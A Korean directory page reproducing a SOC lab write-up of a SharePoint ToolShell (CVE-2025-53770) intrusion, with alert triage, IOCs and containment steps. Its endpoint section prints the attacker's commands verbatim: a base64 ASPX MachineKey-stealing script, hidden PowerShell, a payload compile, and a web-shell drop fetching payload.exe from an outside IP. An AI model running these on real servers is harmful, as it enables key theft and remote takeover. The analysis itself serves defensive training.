Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/michaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell
Indicator of Compromise (IOC) ManagementVulnerability AnalysisExploitationWeb Application ExploitationMalware AnalysisDigital ForensicsPenetration TestingThreat IntelligenceLearning & Education

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Incident Response
Labs & Practice
GitHubmichaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

CVE-2025-53770(ToolShell) SharePoint 제로데이 악용에 대한 상세한 분석으로, RCE 분석, MachineKey 유출, 페이로드 컴파일, 웹 셸 배포 및 사고 대응 차단 단계를 포함합니다.

저장소 보기
311개월 전아직 검토되지 않음

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

소개

저는 LetsDefend 랩에서 ToolShell(CVE-2025-53770)이라고 하는 SharePoint 제로데이를 분석했습니다. 악성 POST 요청이 인증을 우회하고, PowerShell을 실행해 MachineKeySection 키를 탈취하고, payload.exe를 컴파일하고, 웹 셸(spinstall0.aspx)을 드롭하는 실제 제로데이 공격을 재현했습니다. 모든 것을 기록하고, 동작을 분석하고, 호스트를 격리했습니다. 이 README는 공격 프로세스, 공격을 저지하기 위한 단계, 그리고 교훈을 다룹니다.

랩 개요

  • 플랫폼: LetsDefend Cyber Range
  • 대상: SharePoint Server (SharePoint01)
  • CVE: CVE-2025-53770
  • 목표: RCE 분석, 탐지 및 격리 실습

사용된 도구:

  • Windows PowerShell
  • VirusTotal
  • AbuseIPDB
  • LetsDefend Log Management
  • LetsDefend Endpoint Security
  • Base64 Decoder
  • LetsDefend Threat Intel

알림(Alert)

image

이것은 대용량 페이로드와 스푸핑된 Referer로 MS SharePoint의 ToolPane.aspx를 표적으로 삼은 중요(critical) 알림이자 의심스러운 활동입니다. CVE 맥락은 CVE-2025-53770과 연결되어 있습니다. 이는 특수하게 조작된 POST 요청을 통해 인증되지 않은 공격자를 허용한 SharePoint의 치명적인 취약점입니다. 성공적인 악용은 서버에서 원격 코드 실행(RCE)으로 이어졌습니다. 저는 이를 활성 상태이자 긴급도가 높은 것으로 간주했고, 그 반대가 입증될 때까지 성공적인 침해 가능성이 있다고 가정했습니다.

SharePoint의 간단한 의미

Microsoft SharePoint는 기업 협업과 문서 관리를 위한 플랫폼입니다. 본질적으로 파일, 워크플로, 내부 웹 앱을 위한 안전하고 체계적인 허브입니다.

주요 용도

  • 문서 관리: 버전 관리, 감사 추적, 파일 권한

  • 협업: 여러 사용자가 문서를 공동 편집하고 공유할 수 있음

  • 인트라넷 / 포털: 사내 뉴스, 인사 정책, 대시보드

  • 워크플로 및 자동화: 양식, 승인, 알림

  • 통합: Teams, Outlook, Office 앱, Power BI와 연결

SharePoint 보안 고려 사항

  • 인증에 Active Directory 또는 SSO 사용

  • 저장 데이터 및 전송 중 데이터 암호화

  • 잘못 구성된 경우 웹 파트와 레이아웃이 악용될 수 있음

  • 제로데이 익스플로잇 방어를 위한 정기 패치가 중요함

CVE-2025-53770(ToolShell)이란?

인증 없이 원격으로 코드를 실행할 수 있게 하는 Microsoft SharePoint Server의 치명적인 제로데이 취약점입니다. 안전하지 않은 역직렬화(insecure deserialization)를 악용하며, 전체 시스템 장악을 위해 다른 SharePoint 결함(CVE-2025-49704, CVE-2025-49706)과 자주 연쇄적으로 사용됩니다. CVSS 9.8(치명적)로 평가되었으며 실제 환경에서 활발히 악용되고 있습니다.

VirusTotal을 통한 공격 분석

VirusTotal로 발신자(소스 IP 주소)의 IP 주소를 분석했습니다. 소스 IP 주소: 107.191.58.76 image

이를 통해 15/95 보안 벤더가 이 IP 주소를 악성으로 플래그했음을 확인할 수 있는데, 이는 이미 이 IP에 대해 많은 것을 말해줍니다.

IP 위치

이제 IP의 위치를 검색해야 합니다. 이는 AbuseIPDB의 도움으로 수행되었으며, 아래와 같이 이 IP는 해킹, 무차별 대입(brute-force), 웹 앱 공격, 포트 스캔, DNS 포이즈닝으로 알려져 있습니다.

image

엔드포인트 분석

이를 해결하는 SOC 분석가로서 취해야 할 중요한 단계 중 하나는 엔드포인트 분석입니다. 추가 분석을 위해 'SharePoint01'이라는 이름으로 엔드포인트 보안에서 호스트를 검색했습니다. 해당 IP가 해킹으로 알려져 있기 때문입니다.

image

호스트를 찾은 후, 명령줄을 확인하기 위해 터미널 기록을 살펴보았습니다.

image

| 터미널 기록 명령줄

PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyk7DQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg==

PowerShell 플래그: -nop -w hidden -e

  • -nop = 프로필 없음(프로필 스크립트 회피)
  • -w hidden = 창을 숨긴 상태로 시작(스텔스)
  • -e = 인코딩된 명령

Base64 디코더를 통한 명령줄 분석 결과:

페이로드 때문에 Base64 디코더로 명령을 디코딩했습니다(아래 참조).

image

사용자는 시스템 디렉터리 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"에서 PowerShell을 실행했고, 인코딩된 명령으로 ASP.NET 서버 측 C# 스크립트를 실행했습니다.

  • 리플렉션을 사용해 System.Web 어셈블리를 로드하고,
  • 비공개 MachineKeySection에 접근하고 비공개 메서드(GetApplicationConfig)를 호출하며,
  • 웹 애플리케이션의 MachineKey 값(ValidationKey, DecryptionKey 등)을 읽고,
  • 해당 키를 HTTP 응답에 작성합니다(즉, 외부로 유출).

페이로드 캡처 및 사후 악용 활동: / _layouts/15/ToolPane.aspx?...

페이로드는 호스트의 ASP.NET MachineKey(호스트의 비밀)를 읽고 유출하려고 시도합니다. 이 키는 ViewState/역직렬화 토큰을 위조하고 인증 우회 및 원격 코드 실행을 가능하게 하는 데 사용될 수 있습니다. 이는 ToolShell 악용 패턴(MachineKey 남용)과 일치합니다. Base64 디코드 및 인코드를 사용한 명령의 주요 침해 지표(IoC)는 다음과 같습니다.

  • POST + 대용량 페이로드 + 이 인코딩된 명령은 공격자가 ToolShell 악용 경로를 통해 그러한 서버 측 스크립트를 생성하거나 실행하려 시도했을 가능성이 있음을 나타냅니다.
  • MachineKey 노출 및 알림 트리거: -encodedCommand + 숨겨진 창 + base64 페이로드의 사용은 은닉(evasion) 및 자동화된 악용을 나타냅니다. 공격자는 페이로드를 숨기고 탐지/명령줄 로깅 패턴을 피하기 위해 -encodedCommand를 자주 사용합니다. 이를 통해 공격자는 애플리케이션이 유효한 것으로 수락할 악성 ViewState 또는 직렬화된 페이로드를 생성하여 취약한 SharePoint 인스턴스에서 인증 우회와 원격 코드 실행을 가능하게 합니다. ToolShell(CVE-2025-53770)의 경우 이것이 바로 악용 체인입니다.

CMD 실행 및 악용

공격자는 비공개 구성에 접근하려 시도했고, 따라서 .NET을 남용하여 악용을 노렸습니다. Base64 디코더에서 System.Web.Configuration.MachineKeySection과 GetApplicationConfig를 확인할 수 있습니다. MachineKeySection에는 다음이 포함됩니다:

  • 머신/앱의 ValidationKey
  • 머신/앱의 DecryptionKey

이 키는 viewstate 및 폼 인증을 보호하는 데 사용되는 비밀입니다. 이를 검색하는 것은 직렬화된 ASP.NET 페이로드를 위조/검증할 수 있는 자료를 얻으려는 직접적인 시도이며, 이는 역직렬화 기반 RCE의 직접적인 선행 조건입니다.

CMD 명령 분석 결과:

위에서 본 것처럼 단 3초 후, 공격자는 또 다른 명령을 보냈습니다.

image

| 터미널 기록 명령줄

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs.

분석 결과

  • 이 명령은 .NET 프레임워크에 포함된 C# 컴파일러(csc.exe)를 보여줍니다. 이 컴파일러의 역할은 소스 코드(.cs 파일)를 가져와 일반적으로 .exe 또는 .dll인 .NET 어셈블리로 컴파일하는 것입니다.
  • 공격자는 피해자 호스트에 C# 소스 파일(payload.cs)을 업로드하거나 생성한 다음, 내장된 .NET 컴파일러(csc.exe)를 사용해 Windows 실행 파일(payload.exe)로 컴파일했습니다. 이 페이로드는 악성코드일 수 있습니다.

또 다른 CMD 명령 분석 결과:

위에서 본 것처럼 단 2초 후, 공격자는 또 다른 명령을 보냈습니다.

image

| 터미널 기록 명령줄

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs."C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx.

분석 결과

  • 공격자는 cmd.exe를 사용하여 해당 경로에 HTML 폼/객체를 echo하여 SharePoint의 LAYOUTS 디렉터리 안에 새 ASPX 파일(spinstall0.aspx)을 만들었습니다.
  • 주입된 ASPX에는 Url="http://107.191.58.76/payload.exe"가 있는 가 포함되어 있으며, 서버 또는 방문자를 해당 원격 페이로드로 유도합니다.
  • 파일을 ...\TEMPLATE\LAYOUTS\ 아래에 배치하면 SharePoint 웹 애플리케이션을 통해 접근 가능해집니다(지속적인 웹 접근 백도어/드로퍼).
  • 이는 공격자가 제어하는 호스트(107.191.58.76)에서 payload.exe를 원격으로 전달/실행하려는 시도를 나타내며, 침해 및 지속성 위협의 명확한 신호입니다.
  • 또 다른 CMD 명령 분석 결과:

    위에서 본 것처럼 단 5초 후, 공격자는 또 다른 명령을 보냈습니다.

    image

    | 터미널 기록 명령줄

    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command"[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"

    분석 결과

    • 애플리케이션의 MachineKey 구성을 읽는 System.Web.Configuration.MachineKeySection.GetApplicationConfig()를 호출하기 위해 PowerShell을 다시 실행했습니다.
    • 이는 ViewState와 인증 토큰을 서명/암호화하는 데 사용되는 ValidationKey/DecryptionKey 자료를 검색하며, 공격자는 이를 사용해 직렬화된 페이로드를 위조하고 인증을 우회할 수 있습니다.
    • 이는 수동으로 호출된 ToolShell 스타일 악용 체인(RCE 준비)에서 명확하고 일관된 정찰/유출 단계입니다.

    이 활동은 일관된 패턴을 보여주며, 높은 신뢰도의 침해로 간주하고 즉시 포렌식 아티팩트를 수집했습니다.

    위협 인텔리전스

    모든 명령과 분석 결과를 수집한 후, 위협 인텔리전스를 추가로 조사했고 데이터 유형 IP로 검색했습니다. 데이터 소스에는 OnlyHunt와 태그 CVE-2025-53770이 표시되며, 알림 조사 채널의 Referer: /_layouts/SignOut.aspx는 정상적인 SharePoint 작업에서 발생한 것처럼 보이게 하기 위해 스푸핑되거나 사용된 후 SharePoint에서 로그아웃된 합법적인 SharePoint임을 보여줍니다. 그 시점에 저는 호스트를 격리했습니다.

    image

    IOC(아티팩트)

도구 다운로드
  • IP 107.191.58.76: 익스플로잇 POST를 전송한 것으로 관찰된 공격자 소스 IP
  • /_layouts/15/ToolPane.aspx?DisplayMode=Edit: 유형 "url". POST가 표적으로 삼은 익스플로잇 엔드포인트
  • Spinstall0.aspx: 유형 "filename". 배포된 악성 ASPX 백도어 파일 이름
  • MachineKeySection: 유형 "string". MachineKey 유출을 나타내는 ASPX 코드 문자열

내 분석 노트 및 요약

분석가 노트 — SOC342 (CVE-2025-53770 / ToolShell) — SharePoint01

날짜/시간: 2025-07-22 13:07(이벤트) 분석가: [YourName] 케이스 ID: SOC342 호스트: SharePoint01 심각도: 치명적(Critical)

요약

저는 2025-07-22 13:07에 호스트 이름이 SharePoint01인 온프레미스 SharePoint Server에서 ToolShell(CVE-2025-53770)이라고 하는 치명적인 제로데이 취약점 악용 시도를 발견했습니다. 공격자는 POST의 출처이자 페이로드 호스트인 알려진 악성 IP(107.191.58.76)에서 서버의 원격 코드를 실행하기 위해 인증을 우회했습니다. 공격자는 SharePoint LAYOUTS 디렉터리에 spinstall0.aspx를 업로드/생성하고, PowerShell을 실행하여 ASP.NET MachineKey 자료를 읽고 csc.exe로 C# 페이로드를 컴파일했습니다. 따라서 신뢰할 수 있는 페이로드를 제작할 수 있었습니다. 이 활동은 SharePoint의 spinstall0.aspx를 이용한 웹 셸 배포, MachineKey 유출, 호스트 내 페이로드 컴파일과 일치하며, 모두 신뢰도 높은 침해 지표입니다.

플레이북 분석가 노트 업데이트

image
image

공격자 활동을 저지하기 위해 취해야 할 권장 단계:

침해를 발견한 후, 분석가 노트에서 다음과 같은 단계를 수행할 것을 권장했습니다.

  1. 격리(Contain): 승인된 경우 SharePoint01을 네트워크에서 격리하십시오. 그렇지 않은 경우 아웃바운드 이그레스(egress) 제한을 유지하고 공격자 IP/클러스터를 차단하십시오.
  2. 헌트(Hunt): 모든 SharePoint를 검색하고 적절한 백업이 있는지 확인하십시오.
  3. 제거(Eradicate): 확인된 악성 파일과 승인되지 않은 모든 예약 작업/서비스를 제거하고 추가 지속성 메커니즘을 검사하십시오.
  4. 완화(Mitigate): ASP.NET/MachineKey 값을 교체하고 모든 온프레미스 SharePoint 인스턴스에 Microsoft 2025년 7월 긴급 패치를 적용하십시오. 교체는 애플리케이션 소유자와 협의하여 진행하십시오.
  5. 탐지 및 예방(Detect & Prevent): 탐지 규칙을 배포/추가하고 환경 전체에서 유사한 활동을 헌팅하십시오.